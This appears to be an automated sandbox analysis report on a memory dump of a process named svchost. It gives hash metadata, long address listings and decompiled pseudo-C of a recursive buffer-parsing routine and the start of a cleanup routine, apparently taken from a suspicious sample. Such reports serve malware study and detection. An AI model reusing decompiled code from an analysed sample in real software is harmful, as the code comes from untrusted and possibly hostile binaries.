                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                                                                      • String ID: <
                                                                                                                                                                                                                                                                      • API String ID: 2102423945-4251816714
                                                                                                                                                                                                                                                                      • Opcode ID: fd79b48e9fbb9cb9cfac3a3da6eef3a913ec469d5d91857583c19bc0bafd63dd
                                                                                                                                                                                                                                                                      • Instruction ID: 265d75645d11992da4b2f1f59cc45b6cd644182446f2ee9bce3e1a8d4e2d5750
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd79b48e9fbb9cb9cfac3a3da6eef3a913ec469d5d91857583c19bc0bafd63dd
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D11209B5A012289FEB64DF54CD88BEEB7B9BB48704F1041D9E609B7280D7746AC4CF58
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                                                                                                                                      			E04013F50(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed int _a20) {
                                                                                                                                                                                                                                                                      				char _v8;
                                                                                                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                                                                                                                                      				signed int _v21;
                                                                                                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                                                      				intOrPtr _v44;
                                                                                                                                                                                                                                                                      				signed int _v48;
                                                                                                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                                                                                                                                      				signed char _v73;
                                                                                                                                                                                                                                                                      				intOrPtr _v80;
                                                                                                                                                                                                                                                                      				intOrPtr _v84;
                                                                                                                                                                                                                                                                      				intOrPtr _v88;
                                                                                                                                                                                                                                                                      				intOrPtr _v92;
                                                                                                                                                                                                                                                                      				intOrPtr _v96;
                                                                                                                                                                                                                                                                      				intOrPtr _v100;
                                                                                                                                                                                                                                                                      				intOrPtr _v104;
                                                                                                                                                                                                                                                                      				intOrPtr _v108;
                                                                                                                                                                                                                                                                      				intOrPtr _v112;
                                                                                                                                                                                                                                                                      				intOrPtr _v116;
                                                                                                                                                                                                                                                                      				intOrPtr _v120;
                                                                                                                                                                                                                                                                      				intOrPtr _v124;
                                                                                                                                                                                                                                                                      				intOrPtr _v128;
                                                                                                                                                                                                                                                                      				char _v132;
                                                                                                                                                                                                                                                                      				char _v136;
                                                                                                                                                                                                                                                                      				void* _t223;
                                                                                                                                                                                                                                                                      				void* _t224;
                                                                                                                                                                                                                                                                      				void* _t231;
                                                                                                                                                                                                                                                                      				intOrPtr _t237;
                                                                                                                                                                                                                                                                      				void* _t260;
                                                                                                                                                                                                                                                                      				intOrPtr _t267;
                                                                                                                                                                                                                                                                      				signed int _t283;
                                                                                                                                                                                                                                                                      				intOrPtr _t286;
                                                                                                                                                                                                                                                                      				void* _t292;
                                                                                                                                                                                                                                                                      				void* _t394;
                                                                                                                                                                                                                                                                      				void* _t395;
                                                                                                                                                                                                                                                                      				void* _t396;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t395 = __esi;
                                                                                                                                                                                                                                                                      				_t394 = __edi;
                                                                                                                                                                                                                                                                      				_t292 = __ebx;
                                                                                                                                                                                                                                                                      				_v120 = __ecx;
                                                                                                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                                                                                                      				while(_a4 != 0 && _a8 >= 0 && _a12 >= 0xffffffff) {
                                                                                                                                                                                                                                                                      					if(_a8 <=  *((intOrPtr*)(_a4 + 4)) - 1) {
                                                                                                                                                                                                                                                                      						if(_a12 <=  *((intOrPtr*)(_a4 + 4)) - _a8) {
                                                                                                                                                                                                                                                                      							if(_a12 < 0) {
                                                                                                                                                                                                                                                                      								_a12 =  *((intOrPtr*)(_a4 + 4)) - _a8;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_v12 =  *_a4;
                                                                                                                                                                                                                                                                      							_v16 = _a8 + _a12;
                                                                                                                                                                                                                                                                      							_v20 = _a8;
                                                                                                                                                                                                                                                                      							while(_v20 < _v16) {
                                                                                                                                                                                                                                                                      								_v21 = 0;
                                                                                                                                                                                                                                                                      								_t223 = E040072C4(_v12 + _v20, 0x426c54, 2);
                                                                                                                                                                                                                                                                      								_t396 = _t396 + 0xc;
                                                                                                                                                                                                                                                                      								if(_t223 != 0) {
                                                                                                                                                                                                                                                                      									_t224 = E040072C4(_v12 + _v20, 0x426c50, 2);
                                                                                                                                                                                                                                                                      									_t396 = _t396 + 0xc;
                                                                                                                                                                                                                                                                      									if(_t224 != 0) {
                                                                                                                                                                                                                                                                      										L74:
                                                                                                                                                                                                                                                                      										_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                      										continue;
                                                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                                                      										if((_a20 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                      											_v32 = 0;
                                                                                                                                                                                                                                                                      											while(_v32 < 4) {
                                                                                                                                                                                                                                                                      												_t286 = E040070A0( *((intOrPtr*)(0x429f40 + _v32 * 4)));
                                                                                                                                                                                                                                                                      												_t396 = _t396 + 4;
                                                                                                                                                                                                                                                                      												_v36 = _t286;
                                                                                                                                                                                                                                                                      												_push(_v36);
                                                                                                                                                                                                                                                                      												_push( *((intOrPtr*)(0x429f40 + _v32 * 4)));
                                                                                                                                                                                                                                                                      												_t50 = _v20 + 2; // 0x2
                                                                                                                                                                                                                                                                      												_push(_v12 + _t50);
                                                                                                                                                                                                                                                                      												if( *0x4251fc() != 0) {
                                                                                                                                                                                                                                                                      													_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                      													continue;
                                                                                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                                                                                      													_v21 = 1;
                                                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                                                      												goto L24;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										L24:
                                                                                                                                                                                                                                                                      										if((_a16 & 0x000000ff) == 1 && (_v21 & 0x000000ff) == 0 && _v20 + 6 < _v16) {
                                                                                                                                                                                                                                                                      											_t59 = _v20 + 2; // 0x2
                                                                                                                                                                                                                                                                      											_t283 =  *0x4251fc(_v12 + _t59, 0x426cc8, 6);
                                                                                                                                                                                                                                                                      											asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      											_v21 =  ~_t283 + 1;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										_v28 = 0;
                                                                                                                                                                                                                                                                      										if((_v21 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                      											_v28 = E04013F50(_t292, _v120, _t394, _t395, _a4, _v20 + 2, 0xffffffff, _a16 & 0x000000ff, _a20 & 0x000000ff);
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										if(_v28 == 0) {
                                                                                                                                                                                                                                                                      											_v40 = _v20 + 2;
                                                                                                                                                                                                                                                                      											while(_v40 < _v16) {
                                                                                                                                                                                                                                                                      												_t231 = E040072C4(_v12 + _v40, 0x426c54, 2);
                                                                                                                                                                                                                                                                      												_t396 = _t396 + 0xc;
                                                                                                                                                                                                                                                                      												if(_t231 != 0) {
                                                                                                                                                                                                                                                                      													L69:
                                                                                                                                                                                                                                                                      													if(_v8 == 0) {
                                                                                                                                                                                                                                                                      														_v40 = _v40 + 1;
                                                                                                                                                                                                                                                                      														continue;
                                                                                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                                                                                      													}
                                                                                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                                                                                      													if((_v21 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                      														_t86 = _v20 + 2; // 0x2
                                                                                                                                                                                                                                                                      														_v52 = _v12 + _t86;
                                                                                                                                                                                                                                                                      														_v44 = _v40 - _v20 + 2;
                                                                                                                                                                                                                                                                      														_v48 = E04011440(_v120, _v52, _v44);
                                                                                                                                                                                                                                                                      														if(_v48 <= 0xffffffff) {
                                                                                                                                                                                                                                                                      															_t237 = E04020CE0(0x38);
                                                                                                                                                                                                                                                                      															_t396 = _t396 + 4;
                                                                                                                                                                                                                                                                      															_v108 = _t237;
                                                                                                                                                                                                                                                                      															if(_v108 == 0) {
                                                                                                                                                                                                                                                                      																_v132 = 0;
                                                                                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                                                                                      																_v132 = E04010CD0(_v108);
                                                                                                                                                                                                                                                                      															}
                                                                                                                                                                                                                                                                      															_v84 = _v132;
                                                                                                                                                                                                                                                                      															_t197 = _v20 + 2; // 0x2
                                                                                                                                                                                                                                                                      															if((E040111A0(_t292, _v84, _t394, _t395, _v12 + _t197, _v40 - _v20 + 2, _v20, _v40 + 2 - _v20) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                      																if(_v84 != 0) {
                                                                                                                                                                                                                                                                      																	_v116 = _v84;
                                                                                                                                                                                                                                                                      																	_v112 = _v116;
                                                                                                                                                                                                                                                                      																	if(_v112 == 0) {
                                                                                                                                                                                                                                                                      																		_v136 = 0;
                                                                                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                                                                                      																		_v136 = E04006780(_v112, 1);
                                                                                                                                                                                                                                                                      																	}
                                                                                                                                                                                                                                                                      																	_v84 = 0x666;
                                                                                                                                                                                                                                                                      																}
                                                                                                                                                                                                                                                                      																goto L69;
                                                                                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                                                                                      																_v8 = _v84;
                                                                                                                                                                                                                                                                      															}
                                                                                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                                                                                      															_v64 = E040070A0( *((intOrPtr*)(0x429f28 + _v48 * 4)));
                                                                                                                                                                                                                                                                      															_v60 = _v64 + 4;
                                                                                                                                                                                                                                                                      															_v88 = E04020CE0(_v60 + 1);
                                                                                                                                                                                                                                                                      															_v56 = _v88;
                                                                                                                                                                                                                                                                      															_push(2);
                                                                                                                                                                                                                                                                      															E04006CA0(_t292, _t394, _t395, _v56, 0x426c50);
                                                                                                                                                                                                                                                                      															_push(_v64);
                                                                                                                                                                                                                                                                      															E04006CA0(_t292, _t394, _t395, _v56 + 2,  *((intOrPtr*)(0x429f28 + _v48 * 4)));
                                                                                                                                                                                                                                                                      															_push(2);
                                                                                                                                                                                                                                                                      															E04006CA0(_t292, _t394, _t395, _v56 + _v64 + 2, 0x426c54);
                                                                                                                                                                                                                                                                      															_t396 = _t396 + 0x2c;
                                                                                                                                                                                                                                                                      															 *((char*)(_v56 + _v60)) = 0;
                                                                                                                                                                                                                                                                      															_v68 = _v40 + 2;
                                                                                                                                                                                                                                                                      															while(_v68 < _v16 - _v60) {
                                                                                                                                                                                                                                                                      																_t260 = E040072C4(_v12 + _v68, _v56, _v60);
                                                                                                                                                                                                                                                                      																_t396 = _t396 + 0xc;
                                                                                                                                                                                                                                                                      																if(_t260 != 0) {
                                                                                                                                                                                                                                                                      																	L55:
                                                                                                                                                                                                                                                                      																	_v68 = _v68 + 1;
                                                                                                                                                                                                                                                                      																	continue;
                                                                                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                                                                                      																	_v73 = 0 | _v48 == 0x00000005;
                                                                                                                                                                                                                                                                      																	_v72 = E04013F50(_t292, _v120, _t394, _t395, _a4, _v40 + 2, _v68 - _v40 + 2, _v73 & 0x000000ff, _a20 & 0x000000ff);
                                                                                                                                                                                                                                                                      																	if(_v72 == 0) {
                                                                                                                                                                                                                                                                      																		_t267 = E04020CE0(0x38);
                                                                                                                                                                                                                                                                      																		_t396 = _t396 + 4;
                                                                                                                                                                                                                                                                      																		_v92 = _t267;
                                                                                                                                                                                                                                                                      																		if(_v92 == 0) {
                                                                                                                                                                                                                                                                      																			_v124 = 0;
                                                                                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                                                                                      																			_v124 = E04010CD0(_v92);
                                                                                                                                                                                                                                                                      																		}
                                                                                                                                                                                                                                                                      																		_v80 = _v124;
                                                                                                                                                                                                                                                                      																		_t160 = _v40 + 2; // 0x2
                                                                                                                                                                                                                                                                      																		if((E04010D70(_t292, _v80, _t394, _t395,  *((intOrPtr*)(0x429f10 + _v48 * 4)), _v12 + _t160, _v68 - _v40 + 2, _v20, _v68 + _v60 - _v20) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                      																			if(_v80 != 0) {
                                                                                                                                                                                                                                                                      																				_v100 = _v80;
                                                                                                                                                                                                                                                                      																				_v96 = _v100;
                                                                                                                                                                                                                                                                      																				if(_v96 == 0) {
                                                                                                                                                                                                                                                                      																					_v128 = 0;
                                                                                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                                                                                      																					_v128 = E04006780(_v96, 1);
                                                                                                                                                                                                                                                                      																				}
                                                                                                                                                                                                                                                                      																				_v80 = 0x666;
                                                                                                                                                                                                                                                                      																			}
                                                                                                                                                                                                                                                                      																			goto L55;
                                                                                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                                                                                      																			_v8 = _v80;
                                                                                                                                                                                                                                                                      																		}
                                                                                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                                                                                      																		_v8 = _v72;
                                                                                                                                                                                                                                                                      																	}
                                                                                                                                                                                                                                                                      																}
                                                                                                                                                                                                                                                                      																break;
                                                                                                                                                                                                                                                                      															}
                                                                                                                                                                                                                                                                      															if(_v56 != 0) {
                                                                                                                                                                                                                                                                      																_v104 = _v56;
                                                                                                                                                                                                                                                                      																E04020CC0(_v104);
                                                                                                                                                                                                                                                                      																_t396 = _t396 + 4;
                                                                                                                                                                                                                                                                      																_v56 = 0x666;
                                                                                                                                                                                                                                                                      															}
                                                                                                                                                                                                                                                                      															goto L69;
                                                                                                                                                                                                                                                                      														}
                                                                                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                                                                                      														_v20 = _v40 + 2;
                                                                                                                                                                                                                                                                      													}
                                                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                                                      												break;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      											if(_v8 == 0) {
                                                                                                                                                                                                                                                                      												goto L74;
                                                                                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                                                      											_v8 = _v28;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								break;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							if(0 != 0) {
                                                                                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					L76:
                                                                                                                                                                                                                                                                      					return _v8;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				goto L76;
                                                                                                                                                                                                                                                                      			}
















































                                                                                                                                                                                                                                                                      0x04013f50
                                                                                                                                                                                                                                                                      0x04013f50
                                                                                                                                                                                                                                                                      0x04013f50
                                                                                                                                                                                                                                                                      0x04013f59
                                                                                                                                                                                                                                                                      0x04013f5c
                                                                                                                                                                                                                                                                      0x04013f63
                                                                                                                                                                                                                                                                      0x04013f86
                                                                                                                                                                                                                                                                      0x04013f99
                                                                                                                                                                                                                                                                      0x04013fa4
                                                                                                                                                                                                                                                                      0x04013faf
                                                                                                                                                                                                                                                                      0x04013faf
                                                                                                                                                                                                                                                                      0x04013fb7
                                                                                                                                                                                                                                                                      0x04013fc0
                                                                                                                                                                                                                                                                      0x04013fc6
                                                                                                                                                                                                                                                                      0x04013fd4
                                                                                                                                                                                                                                                                      0x04013fe0
                                                                                                                                                                                                                                                                      0x04013ff2
                                                                                                                                                                                                                                                                      0x04013ff7
                                                                                                                                                                                                                                                                      0x04013ffc
                                                                                                                                                                                                                                                                      0x04014011
                                                                                                                                                                                                                                                                      0x04014016
                                                                                                                                                                                                                                                                      0x0401401b
                                                                                                                                                                                                                                                                      0x0401443e
                                                                                                                                                                                                                                                                      0x04013fd1
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04014021
                                                                                                                                                                                                                                                                      0x04014027
                                                                                                                                                                                                                                                                      0x04014029
                                                                                                                                                                                                                                                                      0x0401403b
                                                                                                                                                                                                                                                                      0x0401404c
                                                                                                                                                                                                                                                                      0x04014051
                                                                                                                                                                                                                                                                      0x04014054
                                                                                                                                                                                                                                                                      0x0401405a
                                                                                                                                                                                                                                                                      0x04014065
                                                                                                                                                                                                                                                                      0x0401406c
                                                                                                                                                                                                                                                                      0x04014070
                                                                                                                                                                                                                                                                      0x04014079
                                                                                                                                                                                                                                                                      0x04014038
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401407b
                                                                                                                                                                                                                                                                      0x0401407b
                                                                                                                                                                                                                                                                      0x0401407b
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04014079
                                                                                                                                                                                                                                                                      0x0401403b
                                                                                                                                                                                                                                                                      0x04014083
                                                                                                                                                                                                                                                                      0x0401408a
                                                                                                                                                                                                                                                                      0x040140ac
                                                                                                                                                                                                                                                                      0x040140b1
                                                                                                                                                                                                                                                                      0x040140b9
                                                                                                                                                                                                                                                                      0x040140be
                                                                                                                                                                                                                                                                      0x040140be
                                                                                                                                                                                                                                                                      0x040140c1
                                                                                                                                                                                                                                                                      0x040140ce
                                                                                                                                                                                                                                                                      0x040140ef
                                                                                                                                                                                                                                                                      0x040140ef
                                                                                                                                                                                                                                                                      0x040140f6
                                                                                                                                                                                                                                                                      0x0401410e
                                                                                                                                                                                                                                                                      0x0401411c
                                                                                                                                                                                                                                                                      0x04014136
                                                                                                                                                                                                                                                                      0x0401413b
                                                                                                                                                                                                                                                                      0x04014140
                                                                                                                                                                                                                                                                      0x04014429
                                                                                                                                                                                                                                                                      0x0401442d
                                                                                                                                                                                                                                                                      0x04014119
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401442f
                                                                                                                                                                                                                                                                      0x04014146
                                                                                                                                                                                                                                                                      0x0401414c
                                                                                                                                                                                                                                                                      0x04014162
                                                                                                                                                                                                                                                                      0x04014166
                                                                                                                                                                                                                                                                      0x04014174
                                                                                                                                                                                                                                                                      0x04014187
                                                                                                                                                                                                                                                                      0x0401418e
                                                                                                                                                                                                                                                                      0x04014385
                                                                                                                                                                                                                                                                      0x0401438a
                                                                                                                                                                                                                                                                      0x0401438d
                                                                                                                                                                                                                                                                      0x04014394
                                                                                                                                                                                                                                                                      0x040143a3
                                                                                                                                                                                                                                                                      0x04014396
                                                                                                                                                                                                                                                                      0x0401439e
                                                                                                                                                                                                                                                                      0x0401439e
                                                                                                                                                                                                                                                                      0x040143ad
                                                                                                                                                                                                                                                                      0x040143d0
                                                                                                                                                                                                                                                                      0x040143e2
                                                                                                                                                                                                                                                                      0x040143f2
                                                                                                                                                                                                                                                                      0x040143f7
                                                                                                                                                                                                                                                                      0x040143fd
                                                                                                                                                                                                                                                                      0x04014404
                                                                                                                                                                                                                                                                      0x04014418
                                                                                                                                                                                                                                                                      0x04014406
                                                                                                                                                                                                                                                                      0x04014410
                                                                                                                                                                                                                                                                      0x04014410
                                                                                                                                                                                                                                                                      0x04014422
                                                                                                                                                                                                                                                                      0x04014422
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040143e4
                                                                                                                                                                                                                                                                      0x040143e7
                                                                                                                                                                                                                                                                      0x040143e7
                                                                                                                                                                                                                                                                      0x04014194
                                                                                                                                                                                                                                                                      0x040141a7
                                                                                                                                                                                                                                                                      0x040141b0
                                                                                                                                                                                                                                                                      0x040141c2
                                                                                                                                                                                                                                                                      0x040141c8
                                                                                                                                                                                                                                                                      0x040141cb
                                                                                                                                                                                                                                                                      0x040141d6
                                                                                                                                                                                                                                                                      0x040141e1
                                                                                                                                                                                                                                                                      0x040141f4
                                                                                                                                                                                                                                                                      0x040141fc
                                                                                                                                                                                                                                                                      0x0401420e
                                                                                                                                                                                                                                                                      0x04014213
                                                                                                                                                                                                                                                                      0x0401421c
                                                                                                                                                                                                                                                                      0x04014225
                                                                                                                                                                                                                                                                      0x04014233
                                                                                                                                                                                                                                                                      0x04014251
                                                                                                                                                                                                                                                                      0x04014256
                                                                                                                                                                                                                                                                      0x0401425b
                                                                                                                                                                                                                                                                      0x0401435a
                                                                                                                                                                                                                                                                      0x04014230
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04014261
                                                                                                                                                                                                                                                                      0x0401426a
                                                                                                                                                                                                                                                                      0x04014296
                                                                                                                                                                                                                                                                      0x0401429d
                                                                                                                                                                                                                                                                      0x040142b1
                                                                                                                                                                                                                                                                      0x040142b6
                                                                                                                                                                                                                                                                      0x040142b9
                                                                                                                                                                                                                                                                      0x040142c0
                                                                                                                                                                                                                                                                      0x040142cf
                                                                                                                                                                                                                                                                      0x040142c2
                                                                                                                                                                                                                                                                      0x040142ca
                                                                                                                                                                                                                                                                      0x040142ca
                                                                                                                                                                                                                                                                      0x040142d9
                                                                                                                                                                                                                                                                      0x040142fc
                                                                                                                                                                                                                                                                      0x04014319
                                                                                                                                                                                                                                                                      0x04014329
                                                                                                                                                                                                                                                                      0x0401432e
                                                                                                                                                                                                                                                                      0x04014334
                                                                                                                                                                                                                                                                      0x0401433b
                                                                                                                                                                                                                                                                      0x0401434c
                                                                                                                                                                                                                                                                      0x0401433d
                                                                                                                                                                                                                                                                      0x04014347
                                                                                                                                                                                                                                                                      0x04014347
                                                                                                                                                                                                                                                                      0x04014353
                                                                                                                                                                                                                                                                      0x04014353
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401431b
                                                                                                                                                                                                                                                                      0x0401431e
                                                                                                                                                                                                                                                                      0x0401431e
                                                                                                                                                                                                                                                                      0x0401429f
                                                                                                                                                                                                                                                                      0x040142a2
                                                                                                                                                                                                                                                                      0x040142a2
                                                                                                                                                                                                                                                                      0x0401429d
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401425b
                                                                                                                                                                                                                                                                      0x04014363
                                                                                                                                                                                                                                                                      0x04014368
                                                                                                                                                                                                                                                                      0x0401436f
                                                                                                                                                                                                                                                                      0x04014374
                                                                                                                                                                                                                                                                      0x04014377
                                                                                                                                                                                                                                                                      0x04014377
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401437e
                                                                                                                                                                                                                                                                      0x0401414e
                                                                                                                                                                                                                                                                      0x04014154
                                                                                                                                                                                                                                                                      0x04014154
                                                                                                                                                                                                                                                                      0x0401414c
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04014140
                                                                                                                                                                                                                                                                      0x0401443a
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401443c
                                                                                                                                                                                                                                                                      0x040140f8
                                                                                                                                                                                                                                                                      0x040140fb
                                                                                                                                                                                                                                                                      0x040140fb
                                                                                                                                                                                                                                                                      0x040140f6
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04013ffe
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04013ffc
                                                                                                                                                                                                                                                                      0x04014445
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04013f9b
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04013f88
                                                                                                                                                                                                                                                                      0x0401444b
                                                                                                                                                                                                                                                                      0x04014451
                                                                                                                                                                                                                                                                      0x04014451
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _memcmp
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                      • Opcode ID: 4ab6c835b3a8d386f7d6cb5b157b7cd7d659ba90d45b0f81057a5aa373f928b3
                                                                                                                                                                                                                                                                      • Instruction ID: 1232f30742209602bb969d2521b285a9e46184637cee8bf4b984800216b21bdb
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ab6c835b3a8d386f7d6cb5b157b7cd7d659ba90d45b0f81057a5aa373f928b3
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0EF125B0E04219DFDB14DFA8D894BEEBBB1BF48308F148119E415BB2A5D774AA41CF91
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E04023C90(intOrPtr __ecx) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                                                      				intOrPtr _v44;
                                                                                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                                                                                                                                      				intOrPtr _v80;
                                                                                                                                                                                                                                                                      				intOrPtr _v84;
                                                                                                                                                                                                                                                                      				intOrPtr _v88;
                                                                                                                                                                                                                                                                      				intOrPtr _v92;
                                                                                                                                                                                                                                                                      				intOrPtr _v96;
                                                                                                                                                                                                                                                                      				intOrPtr _v100;
                                                                                                                                                                                                                                                                      				signed int _v104;
                                                                                                                                                                                                                                                                      				signed int _v108;
                                                                                                                                                                                                                                                                      				signed int _v112;
                                                                                                                                                                                                                                                                      				signed int _v116;
                                                                                                                                                                                                                                                                      				signed int _v120;
                                                                                                                                                                                                                                                                      				signed int _v124;
                                                                                                                                                                                                                                                                      				intOrPtr _v128;
                                                                                                                                                                                                                                                                      				intOrPtr _t210;
                                                                                                                                                                                                                                                                      				void* _t213;
                                                                                                                                                                                                                                                                      				void* _t324;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_v100 = __ecx;
                                                                                                                                                                                                                                                                      				if( *((intOrPtr*)(_v100 + 0x58)) != 0) {
                                                                                                                                                                                                                                                                      					_v28 =  *((intOrPtr*)(_v100 + 0x58));
                                                                                                                                                                                                                                                                      					_v24 = _v28;
                                                                                                                                                                                                                                                                      					if(_v24 == 0) {
                                                                                                                                                                                                                                                                      						_v104 = 0;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_v104 = E040050D0(_v24, 1);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_v100 + 0x58)) = 0x666;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if( *((intOrPtr*)(_v100 + 4)) != 0) {
                                                                                                                                                                                                                                                                      					_v32 =  *((intOrPtr*)(_v100 + 4));
                                                                                                                                                                                                                                                                      					E04020CC0(_v32);
                                                                                                                                                                                                                                                                      					_t324 = _t324 + 4;
